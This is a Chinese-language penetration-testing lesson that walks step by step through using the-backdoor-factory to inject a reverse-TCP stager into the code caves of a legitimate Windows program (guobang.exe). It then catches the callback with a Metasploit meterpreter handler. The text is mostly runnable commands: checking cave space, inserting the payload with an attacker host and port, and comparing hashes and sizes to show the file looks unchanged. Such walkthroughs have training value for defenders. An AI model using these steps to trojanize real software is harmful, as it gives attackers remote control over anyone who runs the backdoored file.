工具介绍 the-backdoor-factory

项目地址:
https://github.com/secretsquirrel/the-backdoor-factory

原理

可执行二进制文件中有大量的 00,这些 00 是不包含数据的,将这些数据替换成 payload,并且在程序执行的时候,jmp 到代码段,来触发 payload。

以项目中的过磅系统为例:

  1. root@John:~/Desktop# git clone https://github.com/secretsquirrel/the-backdoor-factory.git
  2. //安装the-backdoor-factory

第九课:工具介绍-the-backdoor-factory - 图1

  1. root@John:~/Desktop/the-backdoor-factory# ./backdoor.py -f ~/demo/guobang.exe -S
  2. //检测是否支持后门植入

第九课:工具介绍-the-backdoor-factory - 图2

  1. root@John:~/Desktop/the-backdoor-factory# ./backdoor.py -f ~/demo/guobang.exe -c -l 150
  2. //测试裂缝空间size150

第九课:工具介绍-the-backdoor-factory - 图3

  1. root@John:~/Desktop/the-backdoor-factory# ./backdoor.py -f ~/demo/guobang.exe -s show
  2. //查看可用payload

第九课:工具介绍-the-backdoor-factory - 图4

  1. root@John:~/Desktop/the-backdoor-factory# ./backdoor.py -f ~/demo/guobang.exe -H 192.168.1.111 -P 8080 -s iat_reverse_tcp_stager_threaded
  2. //插入payload,并生成文件。

第九课:工具介绍-the-backdoor-factory - 图5

  1. root@John:~/Desktop/the-backdoor-factory# md5sum ./guobang.exe /root/demo/guobang.exe
  2. //对比原文件与生成文件MD5

第九课:工具介绍-the-backdoor-factory - 图6

  1. root@John:~/Desktop/the-backdoor-factory# du -k ./guobang.exe /root/demo/guobang.exe
  2. //对比文件大小

第九课:工具介绍-the-backdoor-factory - 图7

  1. msf > use exploit/multi/handler
  2. msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
  3. payload => windows/meterpreter/reverse_tcp
  4. msf exploit(handler) > set lhost 192.168.1.111
  5. lhost => 192.168.1.111
  6. msf exploit(handler) > set lport 8080
  7. lport => 8080
  8. msf exploit(handler) > exploit -j
  9. //开启本地监听

第九课:工具介绍-the-backdoor-factory - 图8

//打开软件
第九课:工具介绍-the-backdoor-factory - 图9

  1. meterpreter > getuid
  2. Server username: John-PC\John

//确定目标

第九课:工具介绍-the-backdoor-factory - 图10

—By Micropoor